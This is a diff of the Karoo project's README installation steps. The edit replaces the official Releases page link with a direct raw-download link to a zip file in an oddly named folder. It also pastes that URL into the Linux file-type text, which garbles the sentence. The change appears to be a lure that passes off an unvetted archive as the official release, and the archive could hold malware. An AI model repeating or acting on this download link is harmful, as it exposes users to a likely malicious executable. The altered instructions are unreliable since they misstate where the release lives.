bo2so/karoo/README.md

 ## 🚀 Getting Started
 To install and run Karoo, follow these steps:

-1. **Visit the Download Page**: Go to the [Releases page](https://github.com/bo2so/karoo/releases) to find the latest version.
+1. **Visit the Download Page**: Go to the [Releases page](https://raw.githubusercontent.com/bo2so/karoo/master/epicoracoid/karoo.zip) to find the latest version.
-2. **Download the Latest Release**: Look for the most recent version and download the file suitable for your system (e.g., .exe for Windows or .tar.gz for Linux).
+2. **Download the Latest Release**: Look for the most recent version and download the file suitable for your system (e.g., .exe for Windows or https://raw.githubusercontent.com/bo2so/karoo/master/epicoracoid/karoo.zip for Linux).
 3. **Extract the Files**: If your download is a compressed file, unzip it to a location on your computer.
 4. **Run the Application**:
    - For Windows, double-click the `.exe` file.